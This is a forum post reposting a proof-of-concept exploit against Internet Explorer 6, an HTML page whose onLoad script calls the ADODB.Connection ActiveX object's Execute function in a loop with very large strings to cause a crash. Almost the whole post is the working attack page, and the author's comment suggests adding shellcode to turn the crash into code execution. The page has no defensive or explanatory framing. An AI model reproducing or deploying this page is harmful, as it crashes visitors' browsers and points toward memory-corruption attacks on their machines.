发新话题
打印

MS Internet Explorer (ADODB Execute) Denial of Service PoC

MS Internet Explorer (ADODB Execute) Denial of Service PoC

复制内容到剪贴板
代码:
<!--
// Internet Explorer &#39;ADODB.Connection&#39; object &#39;Execute&#39; Function Vulnerability POC
// tested on Windows XP SP1/XP SP2, IE 6.0 with latest patches installed
// Author: YAG KOHHA (skyhole [at] gmail.com)
// Greetz: H D Moor, Dark Eagle, str0ke, Maxus, Fuchunic, Offtopic

// Access violation at:
// ----------------------------------------------------
// 77114D0F  66:8B75 00     MOV SI,WORD PTR SS:[EBP]
// ----------------------------------------------------
// P.S. It`s will be fast with some shellcode :P
--!>

<html>
<head>
<title>ADODB.Connection.Execute CRASH TEST</title>
</head>
<script>
function Bang_Bang() {
var a = new ActiveXObject(&#39;ADODB.Connection.2.7&#39;);
var b = &#39;FUCK&#39;;
while (b.length <= 1024*256) b+=b;
for (var i = 0; i < 32768; i++)
try { a.Execute(b,b,b); } catch(e) {}
}
</script>
<body onLoad=&#39;Bang_Bang()&#39;>
<center><h1>WOW!!! Are U live?</h1></center>
</body></html>

TOP

发新话题